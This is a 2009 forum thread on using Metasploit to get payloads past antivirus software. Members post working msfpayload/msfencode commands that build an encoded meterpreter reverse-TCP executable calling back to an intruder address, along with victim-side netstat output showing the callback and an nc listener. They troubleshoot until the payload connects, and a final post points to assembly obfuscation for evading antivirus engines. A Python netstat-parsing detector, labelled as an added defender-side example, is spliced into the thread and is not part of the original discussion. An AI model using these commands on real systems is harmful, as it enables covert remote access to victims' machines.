Government Security
Network Security Resources


Bypassing Antivirus with Metasploit


12 replies to this topic

#1 webdevil (Retired GSO General, Sergeant Major, 1,195 posts)

Posted 15 January 2009 - 06:05 PM

http://in.youtube.co...metasploit.html

Power of Metasploit!
:ph34r: :ph34r:

#2 packet (Specialist, Sergeant Major, 649 posts)

Posted 20 January 2009 - 08:18 AM

That's a great demonstration. Good AV stops me about a third of the time when doing a Pentest so I'm always looking for good ways to get around it. Also when I am able to evade it I can show that one should not rely on AV alone and make a very good practical demonstration for defense in depth.

I've been pretty happy overall with the new 3.2 framework. Thanks for posting the video.

--P>G>>
Abusus non tolit usum
The gopher is back!

#3 webdevil (Retired GSO General, Sergeant Major, 1,195 posts)

Posted 20 January 2009 - 10:01 AM

Bypassing the AVs is, I believe, a new extension to exploitation; AVs are becoming smarter, but not the smartest ;)
Moreover, Metasploit is moving into a lot of diversity, like DidierStevens building them a module for PDF exploits etc. :)

#4 berz3k (Private First Class, Members, 70 posts)

Posted 21 January 2009 - 12:33 AM

Doesn't work!

$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8080 R | ./msfencode -b '' -t exe -o meterpreter.exe
[-] Invalid format: exe

:-(

-berz3k.

#5 webdevil (Retired GSO General, Sergeant Major, 1,195 posts)

Posted 21 January 2009 - 05:19 PM

I believe this is only supported with the latest version (or is it still not in the main trunk??)
Do an SVN update and check once more.

#6 berz3k (Private First Class, Members, 70 posts)

Posted 22 January 2009 - 07:41 PM

Doesn't work! (Win32 Vista)

$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.20.40.32 LPORT=8080 R | ./msfencode -b '' -t exe -o meterpreter.exe

***********************************************************************
***                                                                   *
*** This version of the Ruby interpreter has significant problems, we *
*** strongly recommend that you switch to version 1.8.6 until these   *
*** issues have been corrected. Alternatively, you can download,      *
*** build, and install the latest Ruby snapshot from:                 *
***  - http://www.ruby-lang.org/                                      *
*** For more information, please see the following URL:               *
***  - https://bugs.launchpad.net/bugs/282302                         *
***                                                                   *
***********************************************************************

[*] x86/shikata_ga_nai succeeded, final size 76

intrusa@x ~/MSF/trunk
$ chmod 777 meterpreter.exe

----------------------------------
Works fine over the Unix port (MACOSX x86)
----------------------------------


Creating the .exe file

sh-3.2# ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.20.40.32 LPORT=8080 R | ./msfencode -b '' -t exe -o meterpreter.exe
 [*] x86/shikata_ga_nai succeeded, final size 306

meterpreter.exe executed (Victim)

C:\>netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:25             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1026           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1027           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1032           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1040           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1910           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3372           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4899           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1903         127.0.0.1:1902         TIME_WAIT
  TCP    172.18.0.27:139        0.0.0.0:0              LISTENING
  TCP    172.18.0.27:1910       172.20.40.32:8080      ESTABLISHED <---- kool
  UDP    0.0.0.0:135            *:*
  UDP    0.0.0.0:401            *:*
  UDP    0.0.0.0:402            *:*
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:1028           *:*
  UDP    0.0.0.0:1030           *:*
  UDP    0.0.0.0:3456           *:*
  UDP    172.18.0.27:137        *:*
  UDP    172.18.0.27:138        *:*

Listen port (intruder)

C:\>nc -lp 8080

c:\>    <---- Broken mmmm

Doesn't work! :-( Does anyone know why?

-berz3k.
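As an added defender-side example (not code from this thread or from Metasploit), here is a small Python parser over `netstat -an` output in the layout berz3k quoted: it flags ESTABLISHED outbound TCP sessions to a non-loopback peer on a port outside an assumed allowlist, which is exactly how the 172.18.0.27:1910 to 172.20.40.32:8080 session above stands out from the listeners around it. The sample rows and the allowlist are constructed for the example.

```python
import re
from ipaddress import ip_address

# Constructed sample in the layout of Windows `netstat -an`, modelled on the
# output quoted in the post above (the addresses are the thread's own).
NETSTAT_SAMPLE = """
Active Connections
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1903         127.0.0.1:1902         TIME_WAIT
  TCP    172.18.0.27:139        0.0.0.0:0              LISTENING
  TCP    172.18.0.27:1910       172.20.40.32:8080      ESTABLISHED
  TCP    172.18.0.27:1911       172.18.0.5:445         ESTABLISHED
  UDP    172.18.0.27:137        *:*
"""

# Assumed allowlist of remote ports that are routine for outbound sessions here.
EXPECTED_REMOTE_PORTS = {25, 53, 80, 443, 445}
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")

def split_endpoint(endpoint):
    """Split 'host:port' into (host, port); port is None for '*' or missing."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)

def parse_netstat(text):
    """Yield (proto, lhost, lport, rhost, rport, state) per connection row."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header, blank or unrecognised line
        proto, local, remote, state = m.groups()
        lh, lp = split_endpoint(local)
        rh, rp = split_endpoint(remote)
        yield proto, lh, lp, rh, rp, state or ""

def suspicious_outbound(text, expected_ports=EXPECTED_REMOTE_PORTS):
    """ESTABLISHED TCP sessions to a non-loopback peer on a port outside the
    allowlist, returned as (local, remote) strings for triage."""
    hits = []
    for proto, lh, lp, rh, rp, state in parse_netstat(text):
        if proto != "TCP" or state != "ESTABLISHED" or rp is None:
            continue
        if ip_address(rh).is_loopback or rp in expected_ports:
            continue
        hits.append((f"{lh}:{lp}", f"{rh}:{rp}"))
    return hits
```

Feed it the output of `netstat -an` from a host under review; a hit is a starting point for checking which process owns the local port, not a verdict on its own.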

#7 DidierStevens (Specialist, Sergeant Major, 100 posts)

Posted 23 January 2009 - 02:37 AM

Doesn't work! (Win32 Vista)

***********************************************************************
***                                                                   *
*** This version of the Ruby interpreter has significant problems, we *
*** strongly recommend that you switch to version 1.8.6 until these   *
*** issues have been corrected. Alternatively, you can download,      *
*** build, and install the latest Ruby snapshot from:                 *
***  - http://www.ruby-lang.org/                                      *
*** For more information, please see the following URL:               *
***  - https://bugs.launchpad.net/bugs/282302                         *
***                                                                   *
***********************************************************************


The explanation is right in the error message. msf needs Ruby 1.8.6. You probably downloaded the latest Ruby Windows install from the Ruby site, which is 1.8.7. You need to remove this Ruby version and install 1.8.6.

#8 webdevil (Retired GSO General, Sergeant Major, 1,195 posts)

Posted 23 January 2009 - 03:18 AM

@berz3k
I am not sure what you are trying to do.
You build the exe on the Linux host with IP 172.20.40.32 and test on a Vista host with IP 172.18.0.27. You build a reverse TCP connect shell and check for the reverse shell on the Windows host??

@DidierStevens
If my memory serves me right, I have 1.8.6 and I still get the error. To confirm I will post my versions later on.

#9 DidierStevens (Specialist, Sergeant Major, 100 posts)

Posted 23 January 2009 - 03:55 AM

@DidierStevens
If my memory serves me right, I have 1.8.6 and I still get the error. To confirm I will post my versions later on.


I used msf with Ruby 1.8.7 on a Windows XP box and it didn't work; I had to downgrade to 1.8.6. That was about a month ago.

#10 hamamo (Private, Members, 6 posts)

Posted 24 January 2009 - 10:11 AM

This is a kind of how it is getting smarter.

#11 hamamo (Private, Members, 6 posts)

Posted 24 January 2009 - 11:51 AM

By the way,
nice VD and good job.

#12 berz3k (Private First Class, Members, 70 posts)

Posted 27 January 2009 - 11:40 AM

@DidierStevens

Thanks for the info, dude! Now I am changing the Ruby version.

@Webdevil

1) The meterpreter.exe built on MACOSX/x86 (port) with reverse_tcp, address 172.20.40.32 and port 8080 works fine.

2) Then I put the meterpreter.exe on the victim (172.18.0.27, win2k server) and I saw the TCP 8080 connection; you can see the intruder address (172.20.40.32:8080). It works fine according to netstat.

BUT!!!

3) On the intruder machine (172.20.40.32) I'm listening on port 8080 with nc -lp 8080, and the connection is broken :-(


-berz3k.

#13 zeknox (Private, Members, 1 post)

Posted 18 February 2012 - 11:29 AM

Bypassing AV with metasploit is a hot topic and there are a few different methods to attack this. I feel this article is one of the best methods for evading AV considering it gives the tester plenty of flexibility in obfuscating ASM instructions and allows for bypassing of Static Binary Analysis and Heuristic based AV engines.

http://www.pentestge...st-writing-asm/

Hope this helps!
